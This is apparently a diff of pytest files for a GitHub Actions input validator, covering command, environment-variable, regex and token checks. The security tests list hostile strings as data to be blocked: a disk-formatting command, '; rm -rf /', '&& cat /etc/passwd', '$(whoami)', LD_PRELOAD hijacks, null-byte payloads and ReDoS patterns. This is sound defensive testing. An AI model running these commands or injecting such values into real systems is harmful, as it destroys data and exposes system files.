"mkfs.ext4 /dev/sda",
]
for cmd in dangerous_commands:
self.validator.errors = []
result = self.validator.validate_safe_command(cmd)
assert result is False, f"Should block dangerous command: {cmd}"
assert len(self.validator.errors) > 0
def test_validate_safe_environment_variable(self):
"""Test environment variable validation."""
safe_env_vars = [
"NODE_ENV=production",
"DEBUG=false",
"PORT=3000",
"API_KEY=secret123",
"DATABASE_URL=postgres://localhost:5432/db",
]
for env_var in safe_env_vars:
self.validator.errors = []
result = self.validator.validate_safe_env_var(env_var)
assert result is True, f"Should accept safe env var: {env_var}"
def test_validate_safe_environment_variable_dangerous(self):
"""Test that dangerous environment variables are blocked."""
dangerous_env_vars = [
"LD_PRELOAD=/tmp/evil.so",
"LD_LIBRARY_PATH=/tmp/evil",
"PATH=/tmp/evil:$PATH",
"BASH_ENV=/tmp/evil.sh",
"ENV=/tmp/evil.sh",
]
for env_var in dangerous_env_vars:
self.validator.errors = []
result = self.validator.validate_safe_env_var(env_var)
# These might be blocked depending on implementation
assert isinstance(result, bool)
def test_empty_input_handling(self):
"""Test that empty inputs are handled correctly."""
result = self.validator.validate_no_injection("")
assert result is True # Empty should be safe
assert len(self.validator.errors) == 0
def test_whitespace_input_handling(self):
"""Test that whitespace-only inputs are handled correctly."""
whitespace_inputs = [" ", " ", "\t", "\n", "\r\n"]
for value in whitespace_inputs:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
assert result is True # Whitespace should be safe
def test_validate_inputs_with_security_checks(self):
"""Test validation of inputs with security checks."""
inputs = {
"command": "npm install",
"script": "build.sh",
"arguments": "--production",
"environment": "NODE_ENV=production",
"user-input": "normal text",
"file-path": "src/index.js",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_special_characters_handling(self):
"""Test handling of various special characters."""
# Some special characters might be safe in certain contexts
special_chars = [
"value!", # Exclamation
"value?", # Question mark
"value@domain", # At sign
"value#1", # Hash
"value$100", # Dollar
"value%20", # Percent
"value^2", # Caret
"value&co", # Ampersand
"value*", # Asterisk
"value(1)", # Parentheses
"value[0]", # Brackets
"value{key}", # Braces
]
for value in special_chars:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
# Some might be safe, others not
assert isinstance(result, bool)
def test_unicode_and_encoding_attacks(self):
"""Test handling of Unicode and encoding-based attacks."""
unicode_attacks = [
"\x00command", # Null byte injection
"command\x00", # Null byte suffix
"\u202e\u0072\u006d\u0020\u002d\u0072\u0066", # Right-to-left override
"%00command", # URL encoded null
"\\x72\\x6d\\x20\\x2d\\x72\\x66", # Hex encoded
]
for value in unicode_attacks:
self.validator.errors = []
result = self.validator.validate_no_injection(value)
# These sophisticated attacks might or might not be caught
assert isinstance(result, bool)
def test_validate_regex_pattern_safe_patterns(self):
"""Test that safe regex patterns pass validation."""
safe_patterns = [
r"^\d+$",
r"^[\w]+$",
r"^\d+\.\d+$",
r"^\d+\.\d+\.\d+$",
r"^v?\d+\.\d+(\.\d+)?$",
r"^[\w-]+$",
r"^(alpha|beta|gamma)$",
r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",
r"^[a-z]+@[a-z]+\.[a-z]+$",
r"^https?://[\w.-]+$",
]
for pattern in safe_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is True, f"Should accept safe pattern: {pattern}"
assert len(self.validator.errors) == 0
def test_validate_regex_pattern_nested_quantifiers(self):
"""Test that nested quantifiers are detected and rejected."""
redos_patterns = [
r"(a+)+", # Nested plus quantifiers
r"(a*)+", # Star then plus
r"(a+)*", # Plus then star
r"(a*)*", # Nested star quantifiers
r"(a{1,10})+", # Quantified group with plus
r"(a{2,5})*", # Quantified group with star
r"(a+){2,5}", # Plus quantifier with range quantifier
r"(x*){3,}", # Star quantifier with open-ended range
]
for pattern in redos_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is False, f"Should reject ReDoS pattern: {pattern}"
assert len(self.validator.errors) > 0
assert "ReDoS risk" in self.validator.errors[0]
assert "nested quantifiers" in self.validator.errors[0]
def test_validate_regex_pattern_consecutive_quantifiers(self):
"""Test that consecutive quantifiers are detected and rejected."""
consecutive_patterns = [
r".*.*", # Two .* in sequence
r".*+", # .* followed by +
r".++", # .+ followed by +
r".+*", # .+ followed by *
r"a**", # Two stars
r"a++", # Two pluses
]
for pattern in consecutive_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is False, f"Should reject consecutive quantifier pattern: {pattern}"
assert len(self.validator.errors) > 0
assert "ReDoS risk" in self.validator.errors[0]
assert "consecutive quantifiers" in self.validator.errors[0]
def test_validate_regex_pattern_duplicate_alternatives(self):
"""Test that duplicate alternatives in repeating groups are rejected."""
duplicate_patterns = [
r"(a|a)+", # Exact duplicate alternatives
r"(a|a)*",
r"(foo|foo)+",
r"(test|test)*",
]
for pattern in duplicate_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is False, f"Should reject duplicate alternatives: {pattern}"
assert len(self.validator.errors) > 0
assert "ReDoS risk" in self.validator.errors[0]
assert "duplicate alternatives" in self.validator.errors[0]
def test_validate_regex_pattern_overlapping_alternatives(self):
"""Test that overlapping alternatives in repeating groups are rejected."""
overlapping_patterns = [
r"(a|ab)+", # Second alternative starts with first
r"(ab|a)*", # First alternative starts with second
r"(test|te)+", # Prefix overlap
r"(foo|f)*", # Prefix overlap
]
for pattern in overlapping_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is False, f"Should reject overlapping alternatives: {pattern}"
assert len(self.validator.errors) > 0
assert "ReDoS risk" in self.validator.errors[0]
assert "overlapping alternatives" in self.validator.errors[0]
def test_validate_regex_pattern_deeply_nested(self):
"""Test that deeply nested groups with multiple quantifiers are rejected."""
deeply_nested_patterns = [
r"((a+)+b)+", # Deeply nested with quantifiers
r"(((a*)*)*)*", # Very deep nesting
r"((x+)+(y+)+)+", # Multiple nested quantified groups
]
for pattern in deeply_nested_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is False, f"Should reject deeply nested pattern: {pattern}"
assert len(self.validator.errors) > 0
assert "ReDoS risk" in self.validator.errors[0]
def test_validate_regex_pattern_command_injection(self):
"""Test that command injection in regex patterns is detected."""
injection_patterns = [
r"^\d+$; rm -rf /",
r"test && cat /etc/passwd",
r"pattern | sh",
r"$(whoami)",
r"`id`",
]
for pattern in injection_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is False, f"Should reject injection pattern: {pattern}"
assert len(self.validator.errors) > 0
def test_validate_regex_pattern_empty_input(self):
"""Test that empty patterns are handled correctly."""
self.validator.errors = []
result = self.validator.validate_regex_pattern("")
assert result is True
assert len(self.validator.errors) == 0
result = self.validator.validate_regex_pattern(" ")
assert result is True
assert len(self.validator.errors) == 0
def test_validate_regex_pattern_github_expression(self):
"""Test that GitHub expressions are allowed."""
github_expressions = [
"${{ secrets.PATTERN }}",
"${{ inputs.regex }}",
]
for expr in github_expressions:
self.validator.errors = []
result = self.validator.validate_regex_pattern(expr)
assert result is True, f"Should allow GitHub expression: {expr}"
assert len(self.validator.errors) == 0
def test_validate_regex_pattern_safe_alternation(self):
"""Test that safe alternation without repetition is allowed."""
safe_alternation = [
r"^(alpha|beta|gamma)$", # No repetition
r"(foo|bar)", # No quantifier after group
r"^(red|green|blue)$",
r"(one|two|three)",
]
for pattern in safe_alternation:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is True, f"Should accept safe alternation: {pattern}"
assert len(self.validator.errors) == 0
def test_validate_regex_pattern_optional_groups(self):
"""Test that optional groups (?) are allowed."""
optional_patterns = [
r"^\d+(\.\d+)?$", # Optional decimal part
r"^v?\d+\.\d+$", # Optional 'v' prefix
r"^(https?://)?example\.com$", # Optional protocol
r"^[a-z]+(-[a-z]+)?$", # Optional suffix
]
for pattern in optional_patterns:
self.validator.errors = []
result = self.validator.validate_regex_pattern(pattern, "test-pattern")
assert result is True, f"Should accept optional group: {pattern}"
assert len(self.validator.errors) == 0

74
validate-inputs/tests/test_set-git-config_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for set-git-config custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "set-git-config"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomSetGitConfigValidator:
"""Test cases for set-git-config custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("set-git-config")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for set-git-config
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for set-git-config
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for set-git-config
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for set-git-config
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

83
validate-inputs/tests/test_sync-labels_custom.py Normal file
View File

@@ -0,0 +1,83 @@
"""Tests for sync-labels custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "sync-labels"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomSyncLabelsValidator:
"""Test cases for sync-labels custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("sync-labels")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for sync-labels
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for sync-labels
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for sync-labels
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for sync-labels
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_label_specific_validation(self):
"""Test label-specific validation."""
inputs = {
"labels": ".github/labels.yml",
"token": "${{ secrets.GITHUB_TOKEN }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

74
validate-inputs/tests/test_terraform-lint-fix_custom.py Normal file
View File

@@ -0,0 +1,74 @@
"""Tests for terraform-lint-fix custom validator.
Generated by generate-tests.py - Do not edit manually.
"""
# pylint: disable=invalid-name # Test file name matches action name
from pathlib import Path
import sys
# Add action directory to path to import custom validator
action_path = Path(__file__).parent.parent.parent / "terraform-lint-fix"
sys.path.insert(0, str(action_path))
# pylint: disable=wrong-import-position
from CustomValidator import CustomValidator
class TestCustomTerraformLintFixValidator:
"""Test cases for terraform-lint-fix custom validator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = CustomValidator("terraform-lint-fix")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_validate_inputs_valid(self):
"""Test validation with valid inputs."""
# TODO: Add specific valid inputs for terraform-lint-fix
inputs = {}
result = self.validator.validate_inputs(inputs)
# Adjust assertion based on required inputs
assert isinstance(result, bool)
def test_validate_inputs_invalid(self):
"""Test validation with invalid inputs."""
# TODO: Add specific invalid inputs for terraform-lint-fix
inputs = {"invalid_key": "invalid_value"}
result = self.validator.validate_inputs(inputs)
# Custom validators may have specific validation rules
assert isinstance(result, bool)
def test_required_inputs(self):
"""Test required inputs detection."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
# TODO: Assert specific required inputs for terraform-lint-fix
def test_validation_rules(self):
"""Test validation rules."""
rules = self.validator.get_validation_rules()
assert isinstance(rules, dict)
# TODO: Assert specific validation rules for terraform-lint-fix
def test_github_expressions(self):
"""Test GitHub expression handling."""
inputs = {
"test_input": "${{ github.token }}",
}
result = self.validator.validate_inputs(inputs)
assert isinstance(result, bool)
# GitHub expressions should generally be accepted
def test_error_propagation(self):
"""Test error propagation from sub-validators."""
# Custom validators often use sub-validators
# Test that errors are properly propagated
inputs = {"test": "value"}
self.validator.validate_inputs(inputs)
# Check error handling
if self.validator.has_errors():
assert len(self.validator.errors) > 0

38
validate-inputs/tests/test_token.py Normal file
View File

@@ -0,0 +1,38 @@
"""Tests for token validator.
Generated by generate-tests.py - Do not edit manually.
"""
from validators.token import TokenValidator
class TestTokenValidator:
"""Test cases for TokenValidator."""
def setup_method(self):
"""Set up test fixtures."""
self.validator = TokenValidator("test-action")
def teardown_method(self):
"""Clean up after tests."""
self.validator.clear_errors()
def test_valid_github_token(self):
"""Test valid GitHub tokens."""
# Classic PAT (4 + 36 chars)
assert self.validator.validate_github_token("ghp_" + "a" * 36) is True
# Fine-grained PAT (82 chars)
assert self.validator.validate_github_token("github_pat_" + "a" * 71) is True
# GitHub expression
assert self.validator.validate_github_token("${{ secrets.GITHUB_TOKEN }}") is True
def test_invalid_github_token(self):
"""Test invalid GitHub tokens."""
assert self.validator.validate_github_token("invalid") is False
assert self.validator.validate_github_token("ghp_short") is False
assert self.validator.validate_github_token("", required=True) is False
def test_other_token_types(self):
"""Test other token types."""
# NPM token
assert self.validator.validate_npm_token("npm_" + "a" * 40) is True

156
validate-inputs/tests/test_token_validator.py Normal file
View File

@@ -0,0 +1,156 @@
"""Tests for the TokenValidator module."""
from pathlib import Path
import sys
import pytest # pylint: disable=import-error
# Add the parent directory to the path
sys.path.insert(0, str(Path(__file__).parent.parent))
# pylint: disable=wrong-import-position
from validators.token import TokenValidator
from tests.fixtures.version_test_data import GITHUB_TOKEN_INVALID, GITHUB_TOKEN_VALID
class TestTokenValidator:
"""Test cases for TokenValidator."""
def setup_method(self): # pylint: disable=attribute-defined-outside-init
"""Set up test environment."""
self.validator = TokenValidator()
def test_initialization(self):
"""Test validator initialization."""
assert not self.validator.errors
assert "github_classic" in self.validator.TOKEN_PATTERNS
assert "github_fine_grained" in self.validator.TOKEN_PATTERNS
assert "npm_classic" in self.validator.TOKEN_PATTERNS
@pytest.mark.parametrize("token,description", GITHUB_TOKEN_VALID)
def test_github_token_valid(self, token, description):
"""Test GitHub token validation with valid tokens."""
result = self.validator.validate_github_token(token, required=True)
assert result is True, f"Failed for {description}: {token}"
assert len(self.validator.errors) == 0
@pytest.mark.parametrize("token,description", GITHUB_TOKEN_INVALID)
def test_github_token_invalid(self, token, description):
"""Test GitHub token validation with invalid tokens."""
self.validator.errors = [] # Clear errors
result = self.validator.validate_github_token(token, required=True)
if token == "": # Empty token with required=True should fail
assert result is False
assert len(self.validator.errors) > 0
else:
assert result is False, f"Should fail for {description}: {token}"
def test_github_token_optional_empty(self):
"""Test GitHub token validation with empty optional token."""
result = self.validator.validate_github_token("", required=False)
assert result is True
assert len(self.validator.errors) == 0
def test_github_token_environment_variable(self):
"""Test that environment variable references are accepted."""
tokens = [
"$GITHUB_TOKEN",
"${GITHUB_TOKEN}",
"$MY_TOKEN",
]
for token in tokens:
self.validator.errors = []
result = self.validator.validate_github_token(token)
assert result is True, f"Should accept environment variable: {token}"
def test_npm_token_valid(self):
"""Test NPM token validation with valid tokens."""
valid_tokens = [
"npm_" + "a" * 40, # Classic NPM token
"00000000-0000-0000-0000-000000000000", # UUID format
"$NPM_TOKEN", # Environment variable
"", # Empty (optional)
]
for token in valid_tokens:
self.validator.errors = []
result = self.validator.validate_npm_token(token)
assert result is True, f"Should accept: {token}"
def test_npm_token_invalid(self):
"""Test NPM token validation with invalid tokens."""
invalid_tokens = [
"npm_short", # Too short
"not-a-uuid-or-npm-token", # Invalid format
"npm_" + "a" * 39, # One character too short
]
for token in invalid_tokens:
self.validator.errors = []
result = self.validator.validate_npm_token(token)
assert result is False, f"Should reject: {token}"
assert len(self.validator.errors) > 0
def test_docker_token_valid(self):
"""Test Docker token validation with valid tokens."""
valid_tokens = [
"dckr_pat_" + "a" * 20, # Docker personal access token
"a" * 20, # Generic token
"$DOCKER_TOKEN", # Environment variable
"", # Empty (optional)
]
for token in valid_tokens:
self.validator.errors = []
result = self.validator.validate_docker_token(token)
assert result is True, f"Should accept: {token}"
def test_docker_token_invalid(self):
"""Test Docker token validation with invalid tokens."""
invalid_tokens = [
"short", # Too short (< 10 chars)
"has spaces", # Contains whitespace
"has\nnewline", # Contains newline
"has\ttab", # Contains tab
]
for token in invalid_tokens:
self.validator.errors = []
result = self.validator.validate_docker_token(token)
assert result is False, f"Should reject: {token}"
assert len(self.validator.errors) > 0
def test_validate_inputs(self):
"""Test the main validate_inputs method."""
# Test with various token inputs
inputs = {
"github-token": "${{ github.token }}",
"npm-token": "npm_" + "a" * 40,
"docker-token": "dckr_pat_" + "a" * 20,
}
result = self.validator.validate_inputs(inputs)
assert result is True
assert len(self.validator.errors) == 0
def test_validate_inputs_with_invalid_tokens(self):
"""Test validate_inputs with invalid tokens."""
inputs = {
"github-token": "invalid-github-token",
"npm-token": "invalid-npm",
"docker-token": "short",
}
result = self.validator.validate_inputs(inputs)
assert result is False
assert len(self.validator.errors) > 0
def test_get_validation_rules(self):
"""Test that validation rules are properly defined."""
rules = self.validator.get_validation_rules()
assert "github_token" in rules
assert "npm_token" in rules
assert "docker_token" in rules
assert "patterns" in rules
assert rules["patterns"] == self.validator.TOKEN_PATTERNS

656
validate-inputs/tests/test_update_validators.py Normal file
View File

@@ -0,0 +1,656 @@
"""Comprehensive tests for the update-validators.py script."""
import argparse
import importlib.util
from pathlib import Path
import sys
import tempfile
from unittest.mock import patch
import yaml # pylint: disable=import-error
# Add the scripts directory to the path to import the script
scripts_dir = Path(__file__).parent.parent / "scripts"
sys.path.insert(0, str(scripts_dir))
spec = importlib.util.spec_from_file_location(
"update_validators",
scripts_dir / "update-validators.py",
)
if spec is None or spec.loader is None:
msg = "Could not load update-validators.py module"
raise ImportError(msg)
update_validators = importlib.util.module_from_spec(spec)
spec.loader.exec_module(update_validators)
ValidationRuleGenerator = update_validators.ValidationRuleGenerator
main = update_validators.main
class TestValidationRuleGenerator:
"""Test cases for ValidationRuleGenerator class."""
def setup_method(self):
"""Set up test environment before each test."""
# Create a temporary directory structure for testing
self.temp_dir = tempfile.mkdtemp()
self.temp_path = Path(self.temp_dir)
# Create mock actions directory structure
self.actions_dir = self.temp_path / "actions"
self.actions_dir.mkdir()
# Create validate-inputs directory
self.validate_inputs_dir = self.actions_dir / "validate-inputs"
self.validate_inputs_dir.mkdir()
self.rules_dir = self.validate_inputs_dir / "rules"
self.rules_dir.mkdir()
def teardown_method(self):
"""Clean up after each test."""
import shutil
shutil.rmtree(self.temp_dir)
def create_mock_action(self, name: str, inputs: dict, description: str = "Test action") -> Path:
"""Create a mock action directory with action.yml file."""
action_dir = self.actions_dir / name
action_dir.mkdir()
action_yml = {"name": f"{name} Action", "description": description, "inputs": inputs}
action_file = action_dir / "action.yml"
with action_file.open("w") as f:
yaml.dump(action_yml, f)
return action_file
def test_init(self):
"""Test ValidationRuleGenerator initialization."""
generator = ValidationRuleGenerator(dry_run=True, specific_action="test")
assert generator.dry_run is True
assert generator.specific_action == "test"
assert "github_token" in generator.conventions
assert "semantic_version" in generator.conventions
def test_get_action_directories(self):
"""Test getting action directories."""
# Create some mock actions
self.create_mock_action("test-action", {"version": {"required": True}})
self.create_mock_action("another-action", {"token": {"required": False}})
# Create a directory without action.yml (should be ignored)
(self.actions_dir / "not-an-action").mkdir()
# Create a hidden directory (should be ignored)
(self.actions_dir / ".hidden").mkdir()
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.actions_dir
actions = generator.get_action_directories()
# Should find both valid actions, exclude validate-inputs, hidden dirs, and dirs
# without action.yml
expected = {"test-action", "another-action"}
assert set(actions) == expected
def test_parse_action_file_success(self):
"""Test successful parsing of action.yml file."""
inputs = {
"version": {"description": "Version to release", "required": True},
"token": {
"description": "GitHub token",
"required": False,
"default": "${{ github.token }}",
},
}
self.create_mock_action("test-action", inputs, "Test action for parsing")
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.actions_dir
result = generator.parse_action_file("test-action")
assert result is not None
assert result["name"] == "test-action Action"
assert result["description"] == "Test action for parsing"
assert result["inputs"] == inputs
def test_parse_action_file_missing_file(self):
"""Test parsing when action.yml file doesn't exist."""
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.actions_dir
result = generator.parse_action_file("nonexistent-action")
assert result is None
def test_parse_action_file_invalid_yaml(self):
"""Test parsing when action.yml contains invalid YAML."""
action_dir = self.actions_dir / "invalid-action"
action_dir.mkdir()
# Write invalid YAML
action_file = action_dir / "action.yml"
with action_file.open("w") as f:
f.write("invalid: yaml: content: [unclosed")
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.actions_dir
result = generator.parse_action_file("invalid-action")
assert result is None
def test_detect_validation_type_special_cases(self):
"""Test validation type detection for special cases."""
generator = ValidationRuleGenerator()
# Test special cases from the mapping
assert generator.detect_validation_type("build-args", {}) is None
assert generator.detect_validation_type("version", {}) == "flexible_version"
assert (
generator.detect_validation_type("dotnet-version", {}) == "dotnet_version"
) # Convention-based, not special case
assert generator.detect_validation_type("pre-commit-config", {}) == "file_path"
# Test convention-based detection for dotnet_version pattern (not in special cases)
assert generator.detect_validation_type("dotnet_version", {}) == "dotnet_version"
def test_detect_validation_type_conventions(self):
"""Test validation type detection using conventions."""
generator = ValidationRuleGenerator()
# Test token detection
assert generator.detect_validation_type("token", {}) == "github_token"
assert generator.detect_validation_type("github-token", {}) == "github_token"
assert generator.detect_validation_type("auth_token", {}) == "github_token"
# Test version detection
assert generator.detect_validation_type("app-version", {}) == "semantic_version"
assert generator.detect_validation_type("release-version", {}) == "calver_version"
# Test docker detection
assert generator.detect_validation_type("image-name", {}) == "docker_image_name"
assert generator.detect_validation_type("tag", {}) == "docker_tag"
assert generator.detect_validation_type("architectures", {}) == "docker_architectures"
# Test boolean detection
assert generator.detect_validation_type("dry-run", {}) == "boolean"
assert generator.detect_validation_type("verbose", {}) == "boolean"
assert generator.detect_validation_type("enable-cache", {}) == "boolean"
def test_detect_validation_type_description_fallback(self):
"""Test validation type detection using description when name doesn't match."""
generator = ValidationRuleGenerator()
# Test fallback to description
result = generator.detect_validation_type(
"my_field",
{"description": "GitHub token for authentication"},
)
assert result == "github_token"
result = generator.detect_validation_type(
"custom_flag",
{"description": "Enable verbose output"},
)
assert result == "boolean"
def test_detect_validation_type_calver_description(self):
"""Test CalVer detection based on description keywords."""
generator = ValidationRuleGenerator()
# For version field, special case takes precedence (flexible_version)
result = generator.detect_validation_type(
"version",
{"description": "Release version in calendar format"},
)
assert result == "flexible_version" # Special case overrides description
# Test CalVer detection in other version fields with description
result = generator.detect_validation_type(
"release-version",
{"description": "Monthly release version"},
)
assert result == "calver_version"
def test_detect_validation_type_no_match(self):
"""Test when no validation type can be detected."""
generator = ValidationRuleGenerator()
result = generator.detect_validation_type(
"unknown_field",
{"description": "Some random field with no special meaning"},
)
assert result is None
def test_sort_object_by_keys(self):
"""Test object key sorting."""
generator = ValidationRuleGenerator()
unsorted = {"z": 1, "a": 2, "m": 3, "b": 4}
sorted_obj = generator.sort_object_by_keys(unsorted)
assert list(sorted_obj.keys()) == ["a", "b", "m", "z"]
assert sorted_obj["a"] == 2
assert sorted_obj["z"] == 1
def test_generate_rules_for_action_success(self):
"""Test successful rule generation for an action."""
inputs = {
"version": {"description": "Version to release", "required": True},
"token": {
"description": "GitHub token",
"required": False,
"default": "${{ github.token }}",
},
"dry-run": {"description": "Perform a dry run", "required": False, "default": "false"},
}
self.create_mock_action("test-action", inputs, "Test action for rule generation")
# Initialize generator normally but override paths
generator = ValidationRuleGenerator(dry_run=False)
generator.actions_dir = self.actions_dir
generator.rules_dir = self.rules_dir
rules = generator.generate_rules_for_action("test-action")
assert rules is not None
assert rules["action"] == "test-action"
assert rules["description"] == "Test action for rule generation"
assert "version" in rules["required_inputs"]
assert "token" in rules["optional_inputs"]
assert "dry-run" in rules["optional_inputs"]
# Check conventions detection
assert rules["conventions"]["version"] == "flexible_version" # Special case
assert rules["conventions"]["token"] == "github_token"
assert rules["conventions"]["dry-run"] == "boolean"
# Check statistics
assert rules["statistics"]["total_inputs"] == 3
assert rules["statistics"]["validated_inputs"] == 3
assert rules["validation_coverage"] == 100
def test_generate_rules_for_action_missing_action(self):
"""Test rule generation for non-existent action."""
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.actions_dir
rules = generator.generate_rules_for_action("nonexistent-action")
assert rules is None
def test_write_rules_file_dry_run(self):
"""Test writing rules file in dry run mode."""
rules = {
"action": "test-action",
"schema_version": "1.0",
"generator_version": "1.0.0",
"last_updated": "2024-01-01T00:00:00",
"validation_coverage": 75,
"statistics": {"validated_inputs": 3, "total_inputs": 4},
}
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.temp_path / "actions"
generator.actions_dir.mkdir(parents=True, exist_ok=True)
(generator.actions_dir / "test-action").mkdir(parents=True, exist_ok=True)
generator.dry_run = True
# Capture stdout
with patch("builtins.print") as mock_print:
generator.write_rules_file("test-action", rules)
# Verify dry run output was printed
print_calls = [call.args[0] for call in mock_print.call_args_list]
assert any("[DRY RUN]" in call for call in print_calls)
# Verify no file was created
rules_file = generator.actions_dir / "test-action" / "rules.yml"
assert not rules_file.exists()
def test_write_rules_file_actual_write(self):
"""Test actually writing rules file."""
rules = {
"action": "test-action",
"schema_version": "1.0",
"generator_version": "1.0.0",
"last_updated": "2024-01-01T00:00:00",
"validation_coverage": 75,
"statistics": {"validated_inputs": 3, "total_inputs": 4},
"required_inputs": ["version"],
"conventions": {"version": "semantic_version"},
}
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.temp_path / "actions"
generator.actions_dir.mkdir(parents=True, exist_ok=True)
(generator.actions_dir / "test-action").mkdir(parents=True, exist_ok=True)
generator.dry_run = False
generator.write_rules_file("test-action", rules)
# Verify file was created
rules_file = generator.actions_dir / "test-action" / "rules.yml"
assert rules_file.exists()
# Verify file content
with rules_file.open() as f:
content = f.read()
assert "# Validation rules for test-action action" in content
assert "DO NOT EDIT MANUALLY" in content
assert "Coverage: 75%" in content
# Verify YAML can be parsed
yaml_content = content.split("\n\n", 1)[1] # Skip header
parsed = yaml.safe_load(yaml_content)
assert parsed["action"] == "test-action"
def test_validate_rules_files_success(self):
"""Test validation of existing rules files."""
# Create a valid rules file
rules = {
"action": "test-action",
"required_inputs": ["version"],
"optional_inputs": ["token"],
"conventions": {"version": "semantic_version"},
}
# Create action directory structure
action_dir = self.temp_path / "actions" / "test-action"
action_dir.mkdir(parents=True, exist_ok=True)
rules_file = action_dir / "rules.yml"
with rules_file.open("w") as f:
yaml.dump(rules, f)
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.temp_path / "actions"
result = generator.validate_rules_files()
assert result is True
def test_validate_rules_files_missing_fields(self):
"""Test validation of rules files with missing required fields."""
# Create an invalid rules file (missing required fields)
rules = {
"action": "test-action",
# Missing required_inputs, optional_inputs, conventions
}
# Create action directory structure
action_dir = self.temp_path / "actions" / "test-action"
action_dir.mkdir(parents=True, exist_ok=True)
rules_file = action_dir / "rules.yml"
with rules_file.open("w") as f:
yaml.dump(rules, f)
with patch.object(ValidationRuleGenerator, "__init__", lambda _self, **_kwargs: None):
generator = ValidationRuleGenerator()
generator.actions_dir = self.temp_path / "actions"
with patch("builtins.print") as mock_print:
result = generator.validate_rules_files()
assert result is False
# Verify error was printed
